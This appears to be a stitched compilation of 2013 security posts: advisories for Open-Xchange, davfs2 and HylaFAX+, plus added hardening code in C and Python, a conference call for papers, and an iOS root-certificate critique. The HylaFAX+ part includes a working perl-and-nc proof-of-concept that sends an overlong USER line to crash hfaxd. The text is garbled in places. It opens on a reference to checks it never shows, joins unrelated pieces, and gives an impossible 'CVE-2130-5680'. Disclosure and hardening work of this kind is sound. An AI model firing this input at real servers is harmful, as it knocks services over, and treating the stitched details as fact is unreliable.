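The naive check reports "allowed" because the symlink's own path still sits under app/; the canonicalizing check reports "denied" because the path the kernel would actually open is profiles.ini one level up. Canonicalizing at read time rather than at load time is what closes the window the advisory's step 2 relies on.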
Open-Xchange Security Advisory 2013-09-30
Product: Open-Xchange AppSuite
Vendor: Open-Xchange GmbH

Internal reference: 28642 (Bug ID)
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page)
Vulnerable version: prior to 7.2.2
Vulnerable component: backend
Fixed version: 7.0.2-rev16, 7.2.2-rev20
Report confidence: Confirmed
Solution status: Fixed by Vendor
Vendor notification: 2013-09-02
Solution date: 2013-09-12
Public disclosure: 2013-09-30
CVE reference: CVE-2013-5690
CVSSv2: 5.7 (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND)

Vulnerability Details:
File contents are sanitized to avoid script execution by rogue content. For performance reasons, the sanitization takes place for requests where the MIME type indicates that the content will be displayed/executed within the browser context. While the most commonly used MIME types are covered (text/html), some browsers also execute script code within files signalled with the text/xml MIME type.

Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.)

Solution:
Users should update to the latest available patch releases.

Internal reference: 28635 (Bug ID)
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page)
Vulnerable version: prior to 7.2.2
Vulnerable component: backend
Fixed version: 7.0.2-rev16, 7.2.2-rev20
Report confidence: Confirmed
Solution status: Fixed by Vendor
Vendor notification: 2013-09-02
Solution date: 2013-09-12
Public disclosure: 2013-09-30
CVE reference: CVE-2013-5690
CVSSv2: 5.7 (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND)

Vulnerability Details:
Entering script code into an appointment's Status comment field is possible and is not sanitized. The script code is executed when printing the appointment.

Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.)

Solution:
Users should update to the latest available patch releases.

Internal reference: 28538 (Bug ID)
Vulnerability type: CWE-113 (Improper Neutralization of CRLF Sequences in HTTP Headers) aka 'HTTP Response Splitting'
Vulnerable version: prior to 7.2.2
Vulnerable component: backend
Fixed version: 7.0.2-rev16, 7.2.2-rev20
Report confidence: Confirmed
Solution status: Fixed by Vendor
Vendor notification: 2013-08-27
Solution date: 2013-09-12
Public disclosure: 2013-09-30
CVE reference: CVE-2013-5690
CVSSv2: 5.7 (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND)

Vulnerability Details:
It is possible to use the /ajax/defer servlet to create malicious HTTP responses by injecting crafted HTTP headers. This issue occurs when using AJP as a backend connector to OX, while HTTP-based connectors return an error message for that request.

Risk:
A user may be tricked into opening a link pointing to a trusted URL. However, by crafting malicious parameters for this request, it is possible to inject HTTP headers. These may be used to redirect the user to an unexpected website or to offer unsolicited content in the context of a trusted domain.

Solution:
Users should update to the latest available patch releases.
[ MDVSA-2013:244 ] davfs2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:244
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : davfs2
 Date    : September 30, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in davfs2:

 Davfs2, a filesystem client for WebDAV, calls the function system()
 insecurely while it is setuid root. This might allow a privilege
 escalation (CVE-2013-4362).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4362
 http://www.debian.org/security/2013/dsa-2765
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 f0853a536a00aa39b994df01dade61c5  mes5/i586/davfs2-1.3.3-1.1mdvmes5.2.i586.rpm
 0b7bf41ff10ccfed01f0cd050cd1eb36  mes5/SRPMS/davfs2-1.3.3-1.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 aad5a3a3e974b458b3088a34c15daffb  mes5/x86_64/davfs2-1.3.3-1.1mdvmes5.2.x86_64.rpm
 0b7bf41ff10ccfed01f0cd050cd1eb36  mes5/SRPMS/davfs2-1.3.3-1.1mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 cf2712a4255fe5b908fc516ac392ee08  mbs1/x86_64/davfs2-1.4.6-2.1.mbs1.x86_64.rpm
 1870bfd952eeb78a7ed655c87e7b1b2e  mbs1/SRPMS/davfs2-1.4.6-2.1.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFSSUoTmqjQ0CJFipgRAtYVAKCTY47LexjDiIuYnAvpRiHsZysiNQCgycRi
IwTuT7yEkUtCutNRRSoleGk=
=yR1B
-----END PGP SIGNATURE-----
CVE-2130-5680, HylaFAX+ heap overflow, unchecked network traffic.
Details
=======

Application: HylaFAX+
Version: 5.2.4 (April, 2008) through 5.5.3 (August 6, 2013)
Type: Daemon that manages a fax server via an FTP-like protocol.
Vendor / Maintainer: Lee Howard (faxguy _at_ howardsilvan.com)
Project Homepage: http://hylafax.sourceforge.net/
Vulnerability: CWE-120: Classic buffer overflow from unchecked network traffic, resulting in heap corruption.
Vulnerability Discoverer: Dennis Jenkins (dennis.jenkins.75 _at_ gmail.com)
CVE reference: CVE-2130-5680, 2013-09-03
Solution Status: Fixed by vendor.

Description
===========

HylaFAX™ is an enterprise-class open-source system for sending and receiving facsimiles as well as for sending alpha-numeric pages.

Vulnerability
=============

HylaFAX+ contains a daemon, hfaxd, that allows a fax client to communicate with the fax server to submit fax jobs, query status, configure modems, etc. The underlying wire protocol is a super-set of classic FTP. hfaxd can be compiled with support for authenticating users via LDAP, although usually one just configures hfaxd to use PAM.

The code path for authenticating users via LDAP allocates a 255-byte buffer (via the C++ new operator), and then strcats user-supplied data buffered from the inbound FTP control channel. Other code limits the amount of copied data to 506 bytes, and truncates on NULL and \n. Thus it is possible for an UNAUTHENTICATED remote attacker to overflow the heap with a limited character set. At a minimum, this can crash or hang a forked hfaxd client. At this time, we have not attempted to construct an actual exploit that leverages this security bug.

"hfaxd" typically runs as the "uucp" user, and forks on each new connection. The heap overflow occurs in a forked child. Typically, the child will simply hang. We theorize (but have not tested) that an attacker could consume system resources by abusing the heap overflow. Although this has not been confirmed, the possibility that an attacker may be able to execute arbitrary code in the hfaxd context can not be ruled out.

It should be noted that the principal author of HylaFAX+, Lee Howard, did not write the LDAP code - it was supplied by a third party. After I discovered the bug, Lee and I worked together to fix it, exchanging code patches, performing peer-review and testing. All use of strcat was replaced with snprintf.

For the vulnerability to be exposed, one must first compile HylaFAX+ with LDAP support, and then configure LDAP in hfaxd.conf. Simply compiling with LDAP support alone is insufficient to produce a vulnerable system. Lee and I suspect that the number of HylaFAX+ installations with LDAP support configured is extremely low, if not zero.

This vulnerability does not exist in other versions of HylaFAX. HylaFAX+ was forked from code at hylafax.org in 2005, 3 years before the problematic LDAP code was added to HylaFAX+.

Solution
========

1) Update to HylaFAX+ v5.5.4 (http://hylafax.sourceforge.net/news/5.5.4.php) or later.
   -OR-
2) Disable LDAP authentication (edit hfaxd.conf)

Proof-of-concept
================

1) Enable LDAP authentication on the hfaxd server. Note, a valid LDAP server need not exist. Simply setting the "LDAPServerURI:" directive in "/usr/local/lib/fax/hfaxd.conf" is sufficient.

   # grep ^LDAPServerURI /usr/local/lib/fax/hfaxd.conf
   LDAPServerURI: ldap://127.0.0.1:389

2) Start (or restart) the hfaxd process. Run inside valgrind to see the heap overwrite get caught.

   # valgrind ./hfaxd/hfaxd -c /usr/local/lib/fax/hfaxd.conf -l 192.168.2.33 -q /var/spool/fax -i hylafax -d

3) Run this script from a client system. NOTE: If testing on the same server as the host, don't connect to "localhost" / 127.0.0.1. This will not invoke LDAP (not sure why):

   #
   # Test authentication without buffer overflow:
   #
   # perl -le 'print "USER " . ("x" x 10) . "12345\nPASS test-ldap\nQUIT\n\n"' | nc -q 5:5 192.168.2.33 4559

   (seen on client)
   nc: using stream socket
   220 localhost server (HylaFAX (tm) Version 5.5.4) ready.
   331 Password required for xx12345.
   530 Bind LDAP error -1: Can't contact LDAP server
   530 Login incorrect.

4) Test again, but increase the amount of data in the "USER" command to overwrite the heap:

   # perl -le 'print "USER " . ("x" x 500) . "12345\nPASS test-ldap\nQUIT\n\n"' | nc -q 5:5 192.168.2.33 4559

   (client)
   220 localhost server (HylaFAX (tm) Version 5.5.4) ready.
   331 Password required for
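The advisory's root cause is a fixed 255-byte heap block fed by strcat from a channel that can deliver up to 506 bytes, and its fix is the replacement of strcat with snprintf. The following added example, which is not HylaFAX+ code, shows the bounded append the fix relies on and replays the two USER lines from the proof-of-concept (10 and 500 x's) against a 255-byte heap block, so the reader can see that the long line is cut at 254 bytes plus the terminator instead of running past the allocation. The buffer sizes are taken from the advisory; the input strings are constructed here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { LDAP_BUF = 255, MAX_LINE = 506 };

/*
 * Vulnerable shape described in the advisory (comment only, never compiled):
 *
 *     char *buf = new char[255];
 *     ...
 *     strcat(buf, user_supplied);   // destination size is never consulted
 *
 * Up to 506 bytes arrive from the control channel, so the write runs past
 * the 255-byte heap block.
 */

/* Hardened shape: the fix replaced strcat with snprintf. Appends src to the
 * NUL-terminated string held in dst (capacity dstsz). Returns 0 when the
 * whole of src fit, 1 when it had to be cut, -1 when dst was not terminated.
 * dst is always left NUL-terminated and never written beyond dstsz bytes. */
int bounded_append(char *dst, size_t dstsz, const char *src) {
    const char *end = memchr(dst, '\0', dstsz);
    if (!end) return -1;
    size_t used = (size_t)(end - dst);
    int n = snprintf(dst + used, dstsz - used, "%s", src);
    if (n < 0) return -1;
    return (size_t)n >= dstsz - used;   /* n is the length snprintf wanted */
}

/* Builds the proof-of-concept's USER argument: x_count 'x' characters then
 * "12345", capped at MAX_LINE bytes as the line buffering described in the
 * advisory would, and appends it to a fresh 255-byte heap block. Stores the
 * stored string length in *len; returns bounded_append()'s verdict or -1. */
static int run_demo(int x_count, int *len) {
    char name[MAX_LINE + 1];
    size_t nx = (size_t)(x_count < 0 ? 0 : x_count);
    if (nx > MAX_LINE) nx = MAX_LINE;
    memset(name, 'x', nx);
    name[nx] = '\0';
    bounded_append(name, sizeof name, "12345");
    char *buf = malloc(LDAP_BUF);        /* stands in for `new char[255]` */
    if (!buf) return -1;
    buf[0] = '\0';
    int truncated = bounded_append(buf, LDAP_BUF, name);
    *len = (int)strlen(buf);
    free(buf);
    return truncated;
}

/* Bytes actually stored in the 255-byte block for the given USER line. */
int demo_stored_length(int x_count) {
    int len = 0;
    return run_demo(x_count, &len) < 0 ? -1 : len;
}

/* 1 if the USER line had to be cut to fit, 0 if it fit whole. */
int demo_was_truncated(int x_count) {
    int len = 0;
    return run_demo(x_count, &len);
}

int main(void) {
    printf("10 x's : stored %d bytes, truncated=%d\n",
           demo_stored_length(10), demo_was_truncated(10));
    printf("500 x's: stored %d bytes, truncated=%d\n",
           demo_stored_length(500), demo_was_truncated(500));
    return 0;
}
```

The return value of bounded_append() matters as much as the bounded write: a login path that silently truncates a user name will authenticate against a different name than the one presented, so the caller should treat 1 as a protocol error rather than carry on.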
CFP: WorldCIST'14 - World Conference on IST, at Madeira Island
Apologies if you are receiving this mail more than once...

**
WorldCIST'14
The 2014 World Conference on Information Systems and Technologies
April 15 - 18, Madeira Island, Portugal
http://www.aisti.eu/worldcist14/
**

The 2014 World Conference on Information Systems and Technologies (WorldCIST'14: http://www.aisti.eu/worldcist14) is a global forum for researchers and practitioners to present and discuss the most recent innovations, trends, results, experiences and concerns in the several perspectives of Information Systems and Technologies.

We are pleased to invite you to submit your papers to WorldCIST'14. All submissions will be reviewed on the basis of relevance, originality, importance and clarity.

THEMES

Submitted papers should be related to one or more of the main themes proposed for the Conference:

A) Information and Knowledge Management (IKM);
B) Organizational Models and Information Systems (OMIS);
C) Intelligent and Decision Support Systems (IDSS);
D) Software Systems, Architectures, Applications and Tools (SSAAT);
E) Computer Networks, Mobility and Pervasive Systems (CNMPS);
F) Human-Computer Interaction (HCI);
G) Health Informatics (HIS);
H) Information Technologies in Education (ITE).

TYPES OF SUBMISSIONS AND DECISIONS

Four types of papers can be submitted:

Full paper: Finished or consolidated R&D works, to be included in one of the Conference themes. These papers are assigned a 10-page limit.

Short paper: Ongoing works with relevant preliminary results, open to discussion. These papers are assigned a 7-page limit.

Poster paper: Initial work with relevant ideas, open to discussion. These papers are assigned a 4-page limit.

Company paper: Companies' papers that show practical experience, R&D, tools, etc., focused on some topics of the conference. These papers are assigned a 4-page limit.

Submitted papers must comply with the format of the Advances in Intelligent Systems and Computing Series (see Instructions for Authors at the Springer website or download a DOC example), be written in English, must not have been published before, not be under review for any other conference or publication and not include any information leading to the authors' identification. Therefore, the authors' names, affiliations and bibliographic references should not be included in the version for evaluation by the Program Committee. This information should only be included in the camera-ready version, saved in Word or LaTeX format and also in PDF format. These files must be accompanied by the Consent to Publication form filled out, in a ZIP file, and uploaded at the conference management system.

All papers will be subjected to a double-blind review by at least two members of the Program Committee. Based on the Program Committee evaluation, a paper can be rejected or accepted by the Conference Chairs. In the latter case, it can be accepted as the type originally submitted or as another type. Thus, full papers can be accepted as short papers or poster papers only. Similarly, short papers can be accepted as poster papers only. In these cases, the authors will be allowed to maintain the original number of pages in the camera-ready version.

The authors of accepted poster papers must also build and print a poster to be exhibited during the Conference. This poster must follow an A1 or A2 vertical format. The Conference includes Work Sessions where these posters are presented and orally discussed, with a 5 minute limit per poster.

The authors of accepted full papers will have 15 minutes to present their work in a Conference Work Session; approximately 5 minutes of discussion will follow each presentation.

The authors of accepted short papers and company papers will have 11 minutes to present their work in a Conference Work Session; approximately 4 minutes of discussion will follow each presentation.

PUBLICATION AND INDEXING

To ensure that a full paper, short paper, poster paper or company paper is published in the Proceedings, at least one of the authors must be fully registered by the 24th of January 2014, and the paper must comply with the suggested layout and page limit. Additionally, all recommended changes must be addressed by the authors before they submit the camera-ready version. No more than one paper per registration will be published in the Conference Proceedings. An extra fee must be paid for publication of additional papers, with a maximum of one additional paper per registration.

Full and short papers will be published in Proceedings by Springer, in the Advances in Intelligent Systems and Computing Series. Poster and company papers will be published in Proceedings by AISTI. Published full and short papers will be submitted
iOS: List of available trusted root certificates
From iOS: List of available trusted root certificates, http://support.apple.com/kb/HT5012.

There's no reason to allow some of this to occur in 2013. As a proxy-relying-party, Apple is responsible for this stuff because users are not allowed to make the decisions or modify the Trust Store.

For reference:

Peter Gutmann, Engineering Security, www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf
Baseline Certificate Requirements: https://www.cabforum.org/Baseline_Requirements_V1_1_6.pdf
Extended Validation Certificate Requirements: https://www.cabforum.org/Guidelines_v1_4_3.pdf

Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 1999 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 4 Public Primary Certification Authority - G3
Serial Number: ec:a0:a7:8b:6e:75:6a:01:cf:c4:7c:cc:2f:94:5e:d7
Missing Critical Basic Constraint and CA=TRUE

Subject: C=DK, O=TDC Internet, OU=TDC Internet Root CA
Serial Number: 986490188 (0x3acca54c)
Missing Critical Basic Constraint

Subject: CN=T\xC3\x9CRKTRUST Elektronik Sertifika Hizmet Sa\xC4\x9Flay\xC4\xB1c\xC4\xB1s\xC4\xB1, C=TR, L=ANKARA, O=(c) 2005 T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E.
Serial Number: 1 (0x1)
Missing Critical Basic Constraint

Subject: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server Certification Authority
Serial Number: 927650371 (0x374ad243)
Missing Critical Basic Constraint

Subject: C=CN, O=UniTrust, CN=UCA Root
Serial Number: 9 (0x9)
Missing Critical Basic Constraint

Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary Certification Authority
Serial Number: 70:ba:e4:1d:10:d9:29:34:b6:38:ca:7b:03:cc:ba:bf
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary Certification Authority
Serial Number: 3c:91:31:cb:1f:f6:d0:1b:0e:9a:b8:d0:44:bf:12:be
Missing Critical Basic Constraint and CA=TRUE

Subject: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 2 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=i...@valicert.com
Serial Number: 1 (0x1)
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network
Serial Number: 7d:d9:fe:07:cf:a8:1e:b7:10:79:67:fb:a7:89:34:c6
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 4 Public Primary Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network
Serial Number: 32:88:8e:9a:d2:f5:eb:13:47:f8:7f:c4:20:37:25:f8
Missing Critical Basic Constraint and CA=TRUE

Subject: C=IL, O=StartCom Ltd., OU=Secure Digital Certificate Signing, CN=StartCom Certification Authority
Serial Number: 1 (0x1)
Missing Critical Basic Constraint

Subject: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 1 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=i...@valicert.com
Serial Number: 1 (0x1)
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 1 Public Primary Certification Authority
Serial Number: cd:ba:7f:56:f0:df:e4:bc:54:fe:22:ac:b3:72:aa:55
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 1 Public Primary Certification Authority
Serial Number: 3f:69:1e:81:9c:f0:9a:4a:f3:73:ff:b9:48:a2:e4:dd
Missing Critical Basic Constraint and CA=TRUE

Subject: C=CN, O=UniTrust, CN=UCA Global Root
Serial Number: 8 (0x8)
Missing Critical Basic Constraint

Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 1999 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 2 Public Primary Certification Authority - G3
Serial Number: 61:70:cb:49:8c:5f:98:45:29:e7:b0:a6:d9:50:5b:7a
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DoD CLASS 3 Root CA
Serial Number: 4 (0x4)
Missing Critical Basic Constraint

Subject: C=KR, O=KISA, OU=Korea Certification Authority Central, CN=KISA RootCA 3
Serial Number: 2 (0x2)
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 2 Public Primary Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network
Serial Number: b9:2f:60:cc:88:9f:a1:7a:46:09:b8:5b:70:6c:8a:af
Missing Critical Basic Constraint and CA=TRUE

Subject: C=TW, O=Chunghwa Telecom Co., Ltd., OU=ePKI Root Certification Authority
Serial Number: 15:c8:bd:65:47:5c:af:b8:97:00:5e:e4:06:d2:bc:9d
Missing Critical Basic Constraint

Subject: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=GTE CyberTrust Global
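The check behind each entry above, as an added example that is not part of the post and not Apple's or OpenSSL's code: a stdlib-only DER walker that reports, for a DER-encoded certificate, whether basicConstraints (OID 2.5.29.19) is present, whether it is marked critical, and whether CA=TRUE is asserted, then labels the root the way the list does. The sample certificates are constructed in-line with a placeholder key and a dummy signature (only the TBS structure matters for this check); the helper and function names are assumptions. Roots without any extensions, which is how a v1 certificate looks, come out as "absent", matching the "and CA=TRUE" entries, while v3 roots that carry CA:TRUE but forgot the critical flag match the plain "Missing Critical Basic Constraint" entries:

```python
# Added example: audit basicConstraints in DER certificates (stdlib only).
# Not from the post or Apple's list; sample certificates below are constructed.

OID_BASIC_CONSTRAINTS = bytes([0x55, 0x1D, 0x13])   # 2.5.29.19, DER content octets


def _der_len(n: int) -> bytes:
    """Encode a DER length (short or long form)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der(tag: int, body: bytes) -> bytes:
    """Wrap body in a TLV with the given tag byte."""
    return bytes([tag]) + _der_len(len(body)) + body


def read_tlv(data: bytes, pos: int = 0):
    """Decode one definite-length TLV at pos; return (tag, body, next position)."""
    tag, first = data[pos], data[pos + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        n = first & 0x7F
        length, hdr = int.from_bytes(data[pos + 2:pos + 2 + n], "big"), 2 + n
    start = pos + hdr
    if start + length > len(data):
        raise ValueError("truncated DER element")
    return tag, data[start:start + length], start + length


def basic_constraints(cert_der: bytes) -> dict:
    """Return {'present', 'critical', 'ca'} for the certificate's basicConstraints."""
    result = {"present": False, "critical": False, "ca": False}
    _, cert, _ = read_tlv(cert_der)          # Certificate ::= SEQUENCE
    _, tbs, _ = read_tlv(cert)               # tbsCertificate ::= SEQUENCE
    pos, exts_wrapper = 0, None
    while pos < len(tbs):                    # extensions sit in the [3] EXPLICIT field;
        tag, body, pos = read_tlv(tbs, pos)  # a v1 certificate never has one
        if tag == 0xA3:
            exts_wrapper = body
            break
    if exts_wrapper is None:
        return result
    _, exts, _ = read_tlv(exts_wrapper)      # Extensions ::= SEQUENCE OF Extension
    pos = 0
    while pos < len(exts):
        _, ext, pos = read_tlv(exts, pos)    # Extension ::= SEQUENCE {extnID, critical, extnValue}
        _, oid, p = read_tlv(ext, 0)
        if oid != OID_BASIC_CONSTRAINTS:
            continue
        tag, val, p = read_tlv(ext, p)
        critical = False
        if tag == 0x01:                      # critical BOOLEAN DEFAULT FALSE (omitted when false)
            critical = val != b"\x00"
            tag, val, p = read_tlv(ext, p)
        _, bc, _ = read_tlv(val)             # OCTET STRING holds BasicConstraints ::= SEQUENCE
        ca = False
        if bc:                               # cA BOOLEAN DEFAULT FALSE is the first element
            t2, v2, _ = read_tlv(bc)
            ca = t2 == 0x01 and v2 != b"\x00"
        result.update(present=True, critical=critical, ca=ca)
        return result
    return result


def audit(cert_der: bytes) -> list:
    """Findings for one root; an empty list means the root passes this check."""
    bc = basic_constraints(cert_der)
    findings = []
    if not bc["present"]:
        findings.append("basicConstraints absent")
    elif not bc["critical"]:
        findings.append("basicConstraints not marked critical")
    if not bc["ca"]:
        findings.append("CA=TRUE not asserted")
    return findings


def make_root_cert(with_ext: bool, critical: bool, ca: bool) -> bytes:
    """Constructed v3 certificate skeleton with a placeholder key and dummy signature."""
    sha256_rsa = der(0x30, der(0x06, bytes([0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B])) + der(0x05, b""))
    empty_name = der(0x30, b"")
    validity = der(0x30, der(0x17, b"130101000000Z") + der(0x17, b"330101000000Z"))
    spki = der(0x30, sha256_rsa + der(0x03, b"\x00" * 33))
    fields = [der(0xA0, der(0x02, b"\x02")), der(0x02, b"\x01"), sha256_rsa,
              empty_name, validity, empty_name, spki]
    if with_ext:
        bc_value = der(0x30, der(0x01, b"\xFF") if ca else b"")
        ext = der(0x06, OID_BASIC_CONSTRAINTS) + (der(0x01, b"\xFF") if critical else b"") + der(0x04, bc_value)
        fields.append(der(0xA3, der(0x30, der(0x30, ext))))
    tbs = der(0x30, b"".join(fields))
    return der(0x30, tbs + sha256_rsa + der(0x03, b"\x00" * 33))


if __name__ == "__main__":
    samples = {
        "v3, critical, CA=TRUE": make_root_cert(True, True, True),
        "v3, non-critical, CA=TRUE": make_root_cert(True, False, True),
        "no basicConstraints at all": make_root_cert(False, False, False),
    }
    for label, cert in samples.items():
        print(f"{label}: {audit(cert) or ['OK']}")
```

To run it over a real trust store, feed `audit()` the DER bytes of each root (for PEM input, base64-decode the body between the BEGIN/END lines first). The walker handles only what DER permits, so indefinite-length BER encodings raise rather than being guessed at.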